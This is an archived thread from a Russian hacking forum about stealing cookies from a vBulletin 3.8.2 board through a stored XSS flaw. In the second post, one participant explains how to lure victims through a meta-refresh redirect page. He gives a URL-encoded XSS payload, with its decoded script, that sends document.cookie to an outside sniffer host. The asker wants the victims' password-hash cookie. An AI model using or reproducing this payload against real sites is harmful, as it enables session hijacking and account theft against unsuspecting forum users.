Форумы на Хакер

Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.

Проблема своблой(неотображает куки)

Пользователи, просматривающие топик: none

Зашли как: Guest

Все форумы >> [Для начинающих] >> Проблема своблой(неотображает куки)

Имя

Сообщение

<< Старые топики Новые топики >>

Проблема своблой(неотображает куки) - 2010-07-27 21:12:07.453333

oixel

Сообщений: 69
Оценки: 0
Присоединился: 2010-07-17 12:17:51.640000

vBULLETIN 3.8.2 При <script>alert(document.cookie)</script> выдает всякий хлам кроме vb_asessionalhash , при удалении всякого хлама кроме хэша не выдает ничего ! Как с этим бороться? На снифер также не приходят куки .

Post #: 1

RE: Проблема своблой(неотображает куки) - 2010-07-28 16:04:14.180000

Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333

А как они тебе придут? Через alert чтоли или чё?
Зарегайся на sniffer.xaknet.ru
Зайди в меню Promo и выбери скрипт со сниффером
Создай файл index.html с таким содержанием:

&lt;html&gt; 
 &lt;meta http-equiv="refresh" content="1; url=http://жертва"&gt; 
 &lt;/html&gt;

После чего залей на свой сайт и дай ссыль на этот файлик юзверям поглядеть.
Вместо http://жертва твой линк на XSS (пример: http://site.com/?search=%3C%73%63%72%69%70%74%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%73%6E%69%66%66%65%72%2E%78%61%6B%6E%65%74%2E%72%75%2F%69%6D%61%67%65%73%2F%73%6E%69%66%66%65%72%2E%67%69%66%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E)
где %3C%73%63%72% … - это <sсriрt>img = new Image(); img.src = "http://sniffer.xaknet.ru/images/sniffer.gif?"+document.cookie;</sсriрt> в url-коде.

Post #: 2

RE: Проблема своблой(неотображает куки) - 2010-07-29 15:29:34.630000

oixel

Сообщений: 69
Оценки: 0
Присоединился: 2010-07-17 12:17:51.640000

эммм …. я так и делал! я про то что на сниффер не приходят кукисы и кроме того при алерте кукисов не показывает хэш пароля . Хотя в куках он записан. Месяца 2 назад нашел активную XSS и на этом прогорел .. не знаю почему этот кукис не вылезает :(

Post #: 3

RE: Проблема своблой(неотображает куки) - 2010-07-29 15:46:19

oixel

Сообщений: 69
Оценки: 0
Присоединился: 2010-07-17 12:17:51.640000

Приходит только vbb_lastvisit=1280250311;%20vbb_lastactivity=0

Post #: 4

RE: Проблема своблой(неотображает куки) - 2010-07-29 19:38:51.580000

oixel

Сообщений: 69
Оценки: 0
Присоединился: 2010-07-17 12:17:51.640000

Post #: 5

RE: Проблема своблой(неотображает куки) - 2010-07-30 09:03:51.403333

oixel

Сообщений: 69
Оценки: 0
Присоединился: 2010-07-17 12:17:51.640000

Post #: 6

Страниц: [1]

Все форумы >> [Для начинающих] >> Проблема своблой(неотображает куки)

Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.